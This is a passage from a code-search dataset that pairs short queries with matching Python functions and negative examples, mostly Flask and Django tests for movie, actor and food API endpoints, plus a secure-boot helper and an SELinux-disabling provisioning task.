"def test_delete_song(self):\n podcast = add_podcast('Python Daily', 300, 'Dan Bader')\n with self.client:\n response = self.client.delete(\n f'/api/v1/audio/podcast/{podcast.id}/'\n )\n self.assertEqual(response.status_code, 200)\n self.assertTrue(response.json, {'detail': \"deleted\"})\n print(\"\\n=============================================================\")",
"def test_api_can_delete_food(self):\n food = Food.objects.last()\n response = self.client.delete(f'/api/v1/foods/{food.id}')\n self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)",
"def test_delete_recipe(client):\n resp = client.delete('/recipe/1')\n assert resp.status_code == server.HTTP_METHOD_NOT_ALLOWED",
"def test_delete_dog(self):\n pass",
"def test_delete_actor_director(self):\r\n with self.client as c:\r\n with self.app_context:\r\n c.post(\r\n \"/actors\",\r\n data=json.dumps(self.actor),\r\n headers=TestActorResources.headers_director,\r\n )\r\n results = c.delete(\r\n \"/actors/1\", headers=TestActorResources.headers_director,\r\n )\r\n\r\n data = json.loads(results.data)\r\n\r\n self.assertEqual(data[\"deleted\"], 1)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test post movies endpoint
|
def test_post_movies(self):
body = {
"release_date": "2020/06/11",
"title": "test"
}
response = self.client.post('/movies',
content_type='application/json',
data=json.dumps(body))
body = json.loads(response.data.decode())
self.assertEqual(response.status_code, 201)
self.assertEqual(body['movie']['title'], 'test')
|
[
"def test_post_movie(self):\n body = {\"release_date\": \"2020/06/11\"}\n response = self.client.post('/movies',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 400)\n self.assertEqual(body['message'], ['title should be a string.'])",
"def test_create_movie_superuser(client):\n login_superuser(client)\n\n url = reverse('movies')\n data = {\"name\": \"MyMovie\", \"pub_date\": 2000, \"duration\": 100, \"rating\": 8.8, \"description\": \"\",\n \"categories\": \"Action\"}\n response = client.post(url, data)\n assert response.status_code == 201",
"def test_create_movie_simple_user(client):\n login_simple_user(client)\n\n url = reverse('movies')\n data = {\"name\": \"MyMovie\", \"pub_date\": 2000, \"duration\": 100, \"rating\": 8.8, \"description\": \"\",\n \"categories\": \"Action\"}\n response = client.post(url, data)\n assert response.status_code == 403",
"def test_api_videos_post(self):\n pass",
"def test_createmovie_GET(self):\n self.client.login(username='TestUser', password='user1234')\n url = reverse('myapp:createmovie')\n response = self.client.get(url, follow=True)\n\n # SUCCESS TEST\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'myapp/createmovie.html')\n\n # FAIL TEST\n self.assertNotEquals(response.status_code, not 200)",
"def test_delete_movies(self):\n response = self.client.delete('/movies/1')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['message'], 'Movie Successfully deleted.')",
"def test_patch_movies(self):\n body = {\n \"title\": \"patch\"\n }\n response = self.client.patch('/movies/2',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['movie']['title'], 'patch')",
"def handle_movie_post_request(name):\n name = name.replace(\"_\", \" \")\n if not request.json:\n return make_response(jsonify(\"Bad Request\"), 400)\n if name in MOVIES:\n return update_list(MOVIES, name, request.json, MOVIE_JSON_TO_NODE_DICT)\n else:\n return add_to_list(MOVIES, name, request.json, MOVIE_JSON_TO_NODE_DICT, Movie)",
"def test_add_video(self):\n query_string = [('url', 'url_example')]\n response = self.client.open(\n '/api/video',\n method='POST',\n query_string=query_string)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))",
"def test_delete_movie(self):\n response = self.client.delete('/movies/0')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 404)\n self.assertEqual(body['message'], \"resource not found\")",
"def add_movies():\n try:\n data = json.loads(request.data)\n\n if not data:\n raise MissingFields\n\n popularity, director, genre_list, imdb_score, name = Validator.parse_json(data)\n\n # Add a validation for popularity and imdb_score\n Validator.validate_param(popularity, imdb_score)\n\n if not all([popularity, director, genre_list, imdb_score, name]):\n raise MissingFields\n\n with terminating_sn() as session:\n if MoviesDao.movie_exists(session, name):\n return ResponseMaker(ResponseMaker.RESPONSE_400,\n ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_ENTRY_PRESENT\n ).return_response()\n\n MoviesDao.add_movie(session, popularity, director, genre_list, imdb_score, name)\n return ResponseMaker(ResponseMaker.RESPONSE_200).return_response(\n ResponseMaker.RESPONSE_200_MESSAGE)\n\n except (json.decoder.JSONDecodeError, MissingFields):\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_MISSING_FIELDS).return_response()\n except InputOutOfBounds:\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_OUT_OF_BOUNDS).return_response()\n except Exception:\n session.rollback()\n LOG.exception(\"Exception occurred while writting movie {} to db\".format(name))\n return ResponseMaker(ResponseMaker.RESPONSE_500).return_response(\n ResponseMaker.RESPONSE_500_MESSAGE)",
"def test_requestmovie_GET(self):\n self.client.login(username='TestUser', password='user1234')\n url = reverse('myapp:requestmovie')\n response = self.client.get(url, follow=True)\n\n # SUCCESS TEST\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'myapp/requestmovie.html')\n\n # FAIL TEST\n self.assertNotEquals(response.status_code, not 200)",
"def create_movies(request, *args, **kwargs):\n movie_serializer_class = MovieSerializer\n serializer = movie_serializer_class(data=request.data)\n try:\n serializer.is_valid(raise_exception=True)\n data = serializer.validated_data\n name = data['name']\n director = data['director']\n genre = data['genre']\n genre_objs = []\n for genre_obj in genre:\n if not Genre.objects.filter(name=genre_obj['name']).exists():\n g = Genre.objects.create(name=genre_obj['name'])\n g.save()\n genre_objs.append(g)\n else:\n g = Genre.objects.get(name=genre_obj['name'])\n genre_objs.append(g)\n\n popularity = data['popularity']\n imdb_score = data['imdb_score']\n movie = Movie.objects.create(\n name=name,\n director=director,\n popularity=popularity,\n imdb_score=imdb_score\n )\n movie.save()\n movie.genre.add(*genre_objs)\n return Response({'msg': 'Movie created.'}, status=status.HTTP_201_CREATED)\n except Exception as e:\n return Response({'msg': 'Some Execption Occured.', 'Execption': e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)",
"def test_post_actors(self):\n body = {\n \"age\": 2,\n \"gender\": \"female\",\n \"name\": \"test\"\n }\n response = self.client.post('/actors',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 201)\n self.assertEqual(body['actor']['name'], 'test')",
"def test_movie_creation(self):\n\t\tmovie = self.create_movie()\n\t\tself.assertTrue(isinstance(movie, Movie))",
"def test_retrieve_movies_list(self):\n response_message = json.loads(\n self.get_favourite_movies.get_data(\n as_text=True\n )\n )\n\n self.assertEqual(self.get_favourite_movies.status_code, 200)\n \n self.assertEqual('Your movie list has been retrieved successfully',\n response_message['message'],\n msg=\"Movie list has not been retrieved!\"\n )",
"def test_view():\r\n assert Movie_Management.movie_view() == 1",
"def test_api_activities_post(self):\n pass",
"def handle_movie_and_get_request():\n attr_dict = request.args.to_dict()\n # print(attr_dict)\n movies_matching_query = and_get_request_helper(attr_dict, MOVIES, \"movie\")\n return make_response(jsonify(movies_matching_query),\n 200 if len(movies_matching_query) > 0 else 400)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test update movies endpoint
|
def test_patch_movies(self):
body = {
"title": "patch"
}
response = self.client.patch('/movies/2',
content_type='application/json',
data=json.dumps(body))
body = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
self.assertEqual(body['movie']['title'], 'patch')
|
[
"def test_update_video_watched(self):\n response = self.client.open(\n '/api/video',\n method='PUT')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))",
"def edit_movies():\n movie_id = int(request.args.get('id', 0))\n\n try:\n data = json.loads(request.data)\n\n if not data:\n raise MissingFields\n\n popularity, director, genre_list, imdb_score, name = Validator.parse_json(data)\n\n # Add a validation for popularity and imdb_score\n Validator.validate_param(popularity, imdb_score)\n\n if not movie_id or not any([popularity, director, genre_list, imdb_score, name]):\n raise MissingFields\n\n with terminating_sn() as session:\n if not MoviesDao.movie_id_exists(session, movie_id):\n return ResponseMaker(ResponseMaker.RESPONSE_400,\n ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_ENTRY_MISSING\n ).return_response()\n\n MoviesDao.edit_movie(session, movie_id, popularity, director, genre_list, imdb_score,\n name)\n return ResponseMaker(ResponseMaker.RESPONSE_200).return_response(\n ResponseMaker.RESPONSE_200_MESSAGE)\n\n except (json.decoder.JSONDecodeError, MissingFields):\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_MISSING_FIELDS).return_response()\n except InputOutOfBounds:\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_OUT_OF_BOUNDS).return_response()\n except Exception:\n session.rollback()\n LOG.exception(\"Exception occurred while editing a movie if {} info\".format(movie_id))",
"def update_movies(request, movie_id, *args, **kwargs):\n movie_serializer_class = MovieSerializer\n queryset = Movie.objects.all()\n serializer = movie_serializer_class(data=request.data)\n try:\n serializer.is_valid(raise_exception=True)\n data = serializer.validated_data\n name = data['name']\n director = data['director']\n genre = data['genre']\n popularity = data['popularity']\n imdb_score = data['imdb_score']\n movie = Movie.objects.filter(id=movie_id)\n if movie.exists():\n movie_obj = movie.first()\n movie_obj.name = name\n movie_obj.director = director\n movie_obj.genre = genre\n movie_obj.popularity = popularity\n movie_obj.imdb_score = imdb_score\n movie.save()\n return Response({'msg': 'Movie updated.'}, status=status.HTTP_200_OK)\n else:\n return Response({'msg': 'Movie does not exist.'}, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n return Response({'msg': 'Some Execption Occured.', 'Execption': e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)",
"def test_movie_update(self, name=\"New Movie Name\"):\n\t\tupdated_id = Movie.objects.update(name=name)\n\t\tupdated_movie = Movie.objects.filter(pk=updated_id).first()\n\t\tself.assertTrue(updated_movie.name, name)",
"def test_post_movies(self):\n body = {\n \"release_date\": \"2020/06/11\",\n \"title\": \"test\"\n }\n response = self.client.post('/movies',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 201)\n self.assertEqual(body['movie']['title'], 'test')",
"def handle_movie_put_request(name):\n name = name.replace(\"_\", \" \")\n if (name not in MOVIES) or (not request.json):\n return make_response(jsonify(\"Bad Request\"), 400)\n return update_list(MOVIES, name, request.json, MOVIE_JSON_TO_NODE_DICT)",
"def test_delete_movies(self):\n response = self.client.delete('/movies/1')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['message'], 'Movie Successfully deleted.')",
"def test_put_valid(self):\n data = {'age': 100}\n response = self.app.put('/api/a/actors/Bruce Willis',\n data=json.dumps(data),\n headers=self.headers)\n data = json.loads(response.get_data(as_text=True))\n self.assertEqual(data['age'], 100)\n\n data = {'year': 2005}\n response = self.app.put('/api/a/movies/The First Deadly Sin',\n data=json.dumps(data),\n headers=self.headers)\n data = json.loads(response.get_data(as_text=True))\n self.assertEqual(data['year'], 2005)",
"def test_delete_movie(self):\n response = self.client.delete('/movies/0')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 404)\n self.assertEqual(body['message'], \"resource not found\")",
"def test_create_movie_superuser(client):\n login_superuser(client)\n\n url = reverse('movies')\n data = {\"name\": \"MyMovie\", \"pub_date\": 2000, \"duration\": 100, \"rating\": 8.8, \"description\": \"\",\n \"categories\": \"Action\"}\n response = client.post(url, data)\n assert response.status_code == 201",
"def test_api_videos_id_put(self):\n pass",
"def test_post_movie(self):\n body = {\"release_date\": \"2020/06/11\"}\n response = self.client.post('/movies',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 400)\n self.assertEqual(body['message'], ['title should be a string.'])",
"def test_update_view(self):\n update_data = {'answer': 'updated answer'}\n\n response = self.client.put(self.url, update_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n update_answer = Answer.objects.get(id=self.answer.id)\n self.assertNotEqual(update_answer.answer, self.answer.answer)\n self.assertEqual(update_answer.answer, update_data.get('answer'))\n with self.assertRaises(Answer.DoesNotExist):\n Answer.objects.get(question=self.question, answer=self.answer.answer)\n\n response_json = json.dumps(response.data)\n self.assertIn(str(update_answer.id), response_json)\n self.assertIn(update_answer.answer, response_json)\n self.assertIn(str(update_answer.votes_count), response_json)\n\n response = self.client.put(self.bad_url, update_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)",
"def update_movie(self, movie_id, title, description, genre, rating):\n movie = Movie(movie_id, title, description, genre, rating)\n self.__repo.update(movie_id, movie)",
"def test_update_restaurant_detail(self):\n url = f\"{self.base_url}/\"\n self.resgister_restaurant()\n user_credentials = {\n 'email': self.data['base_user'][\"email\"],\n 'password': self.data['base_user']['password']\n }\n user = User.objects.get(email=user_credentials['email'])\n user.is_active = True\n user.save()\n update_data = {\n \"name\": \"updated restaurant\",\n \"license_number\": \"lic no. 456\",\n \"secondary_phone_number\": \"0123\",\n \"address\": \"ktm\",\n \"bio\": \"updated bio\"\n }\n\n access_token = get_access_token(user_credentials)\n headers = {\n \"HTTP_AUTHORIZATION\": f\"Bearer {access_token}\"\n }\n response = self.client.put(\n path=url, data=update_data, format=\"json\", **headers)\n self.assertTrue(response.data['status'])\n self.assertTrue(\"restaurant_data\" in response.data)\n self.assertEqual(\n response.data['restaurant_data'][0]['address'],\n update_data['address'])\n self.assertEqual(\n response.data['restaurant_data'][0]['license_number'],\n update_data['license_number'])",
"def test_api_can_update_wallpaper(self):\n wallpaper = Wallpaper.objects.get()\n change_wallpaper = {\n 'title': 'Something new', 'author': 'tester', 'tags': 'rwar,rrw'}\n res = self.client.put(\n reverse('details', kwargs={'pk': wallpaper.id}),\n change_wallpaper, format='json'\n )\n self.assertEqual(res.status_code, status.HTTP_200_OK)",
"def test_update_valid_info(self):\n self.app.post('/api/tour', json=sample_tour)\n new_values = {'destination_country': 'aaa', 'duration_days': 0}\n response = self.app.put('/api/tour/1', json=new_values)\n self.assertEqual(status.HTTP_200_OK, response.status_code)\n\n expected_tour = sample_tour.copy()\n expected_tour.update(new_values)\n expected_tour['tour_id'] = 1\n response = self.app.get('/api/tour/1')\n self.assertEqual(status.HTTP_200_OK, response.status_code)\n self.assertEqual(status.HTTP_200_OK, response.status_code)",
"def test_update_outlet(self):\n sample_id = 1\n url = reverse('v1:outlet-detail', kwargs={'outlet_id': sample_id})\n data = {'name': 'NewNews', 'website': 'news2.com', 'description': ''}\n response = self.client.put(url, data, format='json')\n result = json.loads(response.content.decode('utf-8'))\n expected = Outlet.objects.get(id=sample_id)\n self.assertEqual(result['name'], expected.name)\n self.assertEqual(result['website'], expected.website)\n self.assertEqual(result['description'], expected.description)\n self.assertEqual(response.status_code, status.HTTP_200_OK)",
"def test_api_can_update_genes(self):\n change_genes = {'name': 'Something new'}\n res = self.client.put(\n reverse('details', kwargs={'pk': genes.id}),\n change_genes, format='json'\n )\n self.assertEqual(res.status_code, status.HTTP_200_OK)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test delete movies endpoint with a nonexistent id
|
def test_delete_movie(self):
response = self.client.delete('/movies/0')
body = json.loads(response.data.decode())
self.assertEqual(response.status_code, 404)
self.assertEqual(body['message'], "resource not found")
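
Taken together with the 200-path delete test earlier in this file, this 404 case pins down the expected behaviour of DELETE /movies/<id>. The sketch below is an assumed, minimal Flask handler that would satisfy both tests; the in-memory MOVIES dict and the route wiring are placeholders, not the project's actual implementation.

from flask import Flask, jsonify

app = Flask(__name__)
MOVIES = {1: {'title': 'test'}}  # stand-in for the real storage layer

@app.route('/movies/<int:movie_id>', methods=['DELETE'])
def delete_movie(movie_id):
    if movie_id not in MOVIES:
        return jsonify({'message': 'resource not found'}), 404
    del MOVIES[movie_id]
    return jsonify({'message': 'Movie Successfully deleted.'}), 200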
|
[
"def test_delete_movies(self):\n response = self.client.delete('/movies/1')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['message'], 'Movie Successfully deleted.')",
"def test_api_videos_id_delete(self):\n pass",
"def delete_movies(request, movie_id, *args, **kwargs):\n try:\n movie = Movie.objects.filter(id=movie_id)\n if movie.exists():\n movie.delete()\n return Response({'msg': 'Movie deleted.'}, status=status.HTTP_200_OK)\n else:\n return Response({'msg': 'Movie does not exist.'}, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n return Response({'msg': 'Some Execption Occured.', 'Execption': e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)",
"def test_delete_valid(self):\n response = self.app.delete('/api/a/actors/Christopher Lloyd')\n self.assertEqual(response.status_code, 200)\n\n response = self.app.delete('/api/a/movies/Blind Date')\n self.assertEqual(response.status_code, 200)",
"def test_delete_invalid(self):\n response = self.app.delete('/api/a/actors/Bryant Collagauazo')\n self.assertEqual(response.status_code, 400)\n\n response = self.app.delete('/api/a/movies/The Life of Bryant Collaguazo')\n self.assertEqual(response.status_code, 400)",
"def delete_movies():\n movie_id = int(request.args.get('id', 0))\n\n if not movie_id:\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_MISSING_FIELDS).return_response()\n\n try:\n with terminating_sn() as session:\n MoviesDao.delete_movie_from_db(session, movie_id)\n\n return ResponseMaker(ResponseMaker.RESPONSE_200).return_response(\n ResponseMaker.RESPONSE_200_MESSAGE)\n\n except Exception:\n session.rollback()\n LOG.exception(\"Exception occurred while deleting movie id {} from db\".format(movie_id))\n return ResponseMaker(ResponseMaker.RESPONSE_500).return_response(\n ResponseMaker.RESPONSE_500_MESSAGE)",
"def handle_movie_delete_request(name):\n name = name.replace(\"_\", \" \")\n if name in MOVIES:\n del MOVIES[name]\n return make_response(jsonify(\"Deleted Successfully\"), 201)\n else:\n return make_response(jsonify(\"Movie not in database.\"), 400)",
"def test_user_genre_delete_id_no_jwt(self, test_client, genre_test1):\n genre = GenreModel.query.filter_by(name=\"genre test\").first()\n response = test_client.delete(\n \"/api/user/genre/\"+str(genre_test1.genre_id))\n res = json.loads(response.data)\n\n assert response.status_code == 401\n assert res['msg'] == \"Missing Authorization Header\"",
"def test_delete_by_id(self, _id):",
"def test_delete_index(self):\n index = self.client.get_index(uid=\"movies_uid\")\n response = index.delete()\n assert isinstance(response, object)",
"def remove_movie(self, movie_id):\n self.__repo.delete(movie_id)",
"def test_user_genre_delete_id_fake_jwt(self, test_client, headers_fake, genre_test1):\n response = test_client.delete(\n \"/api/user/genre/\"+str(genre_test1.genre_id), headers=headers_fake)\n res = json.loads(response.data)\n\n assert response.status_code == 404\n assert res['status'] == False",
"def test_delete_content_with_invalid_id(self):\n response = self.create_content()\n\n # We want to make sure we have one content in the database..\n self.assertEqual(Content.objects.count(), 1)\n response = self.client.delete(reverse('rud_api', args=(10,)))\n self.assertEqual(Content.objects.count(), 1)\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)",
"def test_delete_todo(self):\n response = self.app.delete('/api/v1/todos/1')\n self.assertEqual(response.status_code, 204)",
"def test_api_can_delete_food(self):\n food = Food.objects.last()\n response = self.client.delete(f'/api/v1/foods/{food.id}')\n self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)",
"def test_delete_absent_instance(self):\r\n response = self.app.delete('/api/person/1')\r\n assert response.status_code == 204",
"def test_404_delete(self):\n res = self.client().delete('/questions/79oq83kljljlk09903284kejflkj')\n\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertTrue(data['message'])",
"def test_delete_fighter(self):\n res = self.request.delete(\"http://127.0.0.1:8000/fighter/1/\")\n self.assertEqual(res.status_code,status.HTTP_200_OK)",
"def test_delete_view(self):\n response = self.client.delete(self.url)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n with self.assertRaises(Answer.DoesNotExist):\n Answer.objects.get(id=self.answer.id)\n\n response = self.client.delete(self.bad_url)\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test post movies endpoint without a title
|
def test_post_movie(self):
body = {"release_date": "2020/06/11"}
response = self.client.post('/movies',
content_type='application/json',
data=json.dumps(body))
body = json.loads(response.data.decode())
self.assertEqual(response.status_code, 400)
self.assertEqual(body['message'], ['title should be a string.'])
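
Together with the successful POST test above, this 400 case fixes the contract of POST /movies: 201 with the created movie when title is a string, otherwise 400 with a list of validation messages. The handler below is a hedged sketch of one way to meet that contract; the payload echo stands in for whatever persistence layer the real app uses, and none of the names are taken from the project itself.

from flask import Flask, jsonify, request

app = Flask(__name__)

@app.route('/movies', methods=['POST'])
def post_movie():
    data = request.get_json(silent=True) or {}
    errors = []
    if not isinstance(data.get('title'), str):
        errors.append('title should be a string.')
    if errors:
        return jsonify({'message': errors}), 400
    # Persistence is omitted; echo the validated payload back instead.
    movie = {'title': data['title'], 'release_date': data.get('release_date')}
    return jsonify({'movie': movie}), 201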
|
[
"def test_post_movies(self):\n body = {\n \"release_date\": \"2020/06/11\",\n \"title\": \"test\"\n }\n response = self.client.post('/movies',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 201)\n self.assertEqual(body['movie']['title'], 'test')",
"def test_create_movie_simple_user(client):\n login_simple_user(client)\n\n url = reverse('movies')\n data = {\"name\": \"MyMovie\", \"pub_date\": 2000, \"duration\": 100, \"rating\": 8.8, \"description\": \"\",\n \"categories\": \"Action\"}\n response = client.post(url, data)\n assert response.status_code == 403",
"def test_create_movie_superuser(client):\n login_superuser(client)\n\n url = reverse('movies')\n data = {\"name\": \"MyMovie\", \"pub_date\": 2000, \"duration\": 100, \"rating\": 8.8, \"description\": \"\",\n \"categories\": \"Action\"}\n response = client.post(url, data)\n assert response.status_code == 201",
"def test_api_videos_post(self):\n pass",
"def test_delete_movie(self):\n response = self.client.delete('/movies/0')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 404)\n self.assertEqual(body['message'], \"resource not found\")",
"def test_patch_movies(self):\n body = {\n \"title\": \"patch\"\n }\n response = self.client.patch('/movies/2',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['movie']['title'], 'patch')",
"def handle_movie_post_request(name):\n name = name.replace(\"_\", \" \")\n if not request.json:\n return make_response(jsonify(\"Bad Request\"), 400)\n if name in MOVIES:\n return update_list(MOVIES, name, request.json, MOVIE_JSON_TO_NODE_DICT)\n else:\n return add_to_list(MOVIES, name, request.json, MOVIE_JSON_TO_NODE_DICT, Movie)",
"def test_delete_movies(self):\n response = self.client.delete('/movies/1')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['message'], 'Movie Successfully deleted.')",
"def test_createmovie_GET(self):\n self.client.login(username='TestUser', password='user1234')\n url = reverse('myapp:createmovie')\n response = self.client.get(url, follow=True)\n\n # SUCCESS TEST\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'myapp/createmovie.html')\n\n # FAIL TEST\n self.assertNotEquals(response.status_code, not 200)",
"def test_get_movies_unauthenticated(client):\n url = reverse('movies')\n response = client.get(url)\n assert response.status_code == 403",
"def test_create_videoobj_invalid(self):\n payload1 = {'name': 'Hello again'}\n payload2 = {'title': ''}\n res = self.client.post(VIDEOS_URL, payload1)\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n res = self.client.post(VIDEOS_URL, payload2)\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)",
"def test_requestmovie_GET(self):\n self.client.login(username='TestUser', password='user1234')\n url = reverse('myapp:requestmovie')\n response = self.client.get(url, follow=True)\n\n # SUCCESS TEST\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'myapp/requestmovie.html')\n\n # FAIL TEST\n self.assertNotEquals(response.status_code, not 200)",
"def test_search_by_title_no_results(self):\n\n res = self.client().post('/books', json={'search':'The Power of Habits'})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['books'], 0)\n self.assertEqual(data['total_books'], 0)",
"def test_add_video(self):\n query_string = [('url', 'url_example')]\n response = self.client.open(\n '/api/video',\n method='POST',\n query_string=query_string)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))",
"def add_movies():\n try:\n data = json.loads(request.data)\n\n if not data:\n raise MissingFields\n\n popularity, director, genre_list, imdb_score, name = Validator.parse_json(data)\n\n # Add a validation for popularity and imdb_score\n Validator.validate_param(popularity, imdb_score)\n\n if not all([popularity, director, genre_list, imdb_score, name]):\n raise MissingFields\n\n with terminating_sn() as session:\n if MoviesDao.movie_exists(session, name):\n return ResponseMaker(ResponseMaker.RESPONSE_400,\n ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_ENTRY_PRESENT\n ).return_response()\n\n MoviesDao.add_movie(session, popularity, director, genre_list, imdb_score, name)\n return ResponseMaker(ResponseMaker.RESPONSE_200).return_response(\n ResponseMaker.RESPONSE_200_MESSAGE)\n\n except (json.decoder.JSONDecodeError, MissingFields):\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_MISSING_FIELDS).return_response()\n except InputOutOfBounds:\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_OUT_OF_BOUNDS).return_response()\n except Exception:\n session.rollback()\n LOG.exception(\"Exception occurred while writting movie {} to db\".format(name))\n return ResponseMaker(ResponseMaker.RESPONSE_500).return_response(\n ResponseMaker.RESPONSE_500_MESSAGE)",
"def test_create_hero_without_name(self):\n params = {\n \"hero\": {\n \"name\": \"\",\n \"description\": \"\",\n \"universe\": \"dc\",\n \"imageUrl\": \"https://image.com/img.jpg\",\n }\n }\n response = self.app.post(path=\"/heroes\", json=params)\n self.assertEqual(response.status_code, 500)\n self.assertEqual(\n response.get_json()[\"details\"], \"Bad request, name is required\"\n )",
"def test_post_recipe(client):\n new_title = \"Peking Duck\"\n resp = client.post('/recipe/1', json={'title': new_title})\n assert resp.status_code == server.HTTP_METHOD_NOT_ALLOWED",
"def search_movies(request):\n movie_title = request.data['title']\n search_movie_url = 'https://api.themoviedb.org/3/search/movie?api_key={}&query={}'.format(api_key, movie_title)\n connect = req.urlopen(search_movie_url)\n data = json.loads(connect.read())\n return JsonResponse({'search results': data['results']}, status= status.HTTP_200_OK)",
"def test_movie_creation(self):\n\t\tmovie = self.create_movie()\n\t\tself.assertTrue(isinstance(movie, Movie))"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Disables secure boot on the node if it is currently enabled. This method checks whether secure boot is enabled on the node; if so, it disables it and returns True.
|
def _disable_secure_boot(task):
    cur_sec_state = False
    try:
        cur_sec_state = sdflex_common.get_secure_boot_mode(task)
    except exception.SDFlexOperationNotSupported:
        LOG.debug('Secure boot mode is not supported for node %s',
                  task.node.uuid)
    else:
        if cur_sec_state:
            LOG.debug('Disabling secure boot for node %s', task.node.uuid)
            sdflex_common.set_secure_boot_mode(task, False)
            return True
    return False
|
[
"def disable_secure_boot_if_supported(task):\n try:\n sdflex_common.update_secure_boot_mode(task, False)\n # We need to handle SDFlexOperationNotSupported exception so that if\n # the user has incorrectly specified the Node capability\n # 'secure_boot' to a node that does not have that capability and\n # attempted deploy. Handling this exception here, will help the\n # user to tear down such a Node.\n except exception.SDFlexOperationNotSupported:\n LOG.warning('Secure boot mode is not supported for node %s',\n task.node.uuid)",
"def is_enabled(node):\n return not node[\"disable\"].value()",
"def enable_ultra_ssd(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"enable_ultra_ssd\")",
"def task_disable_selinux():\n return sequence([\n run(\"if selinuxenabled; then setenforce 0; fi\"),\n run(\"test -e /etc/selinux/config && \"\n \"sed --in-place='.preflocker' \"\n \"'s/^SELINUX=.*$/SELINUX=disabled/g' \"\n \"/etc/selinux/config\"),\n ])",
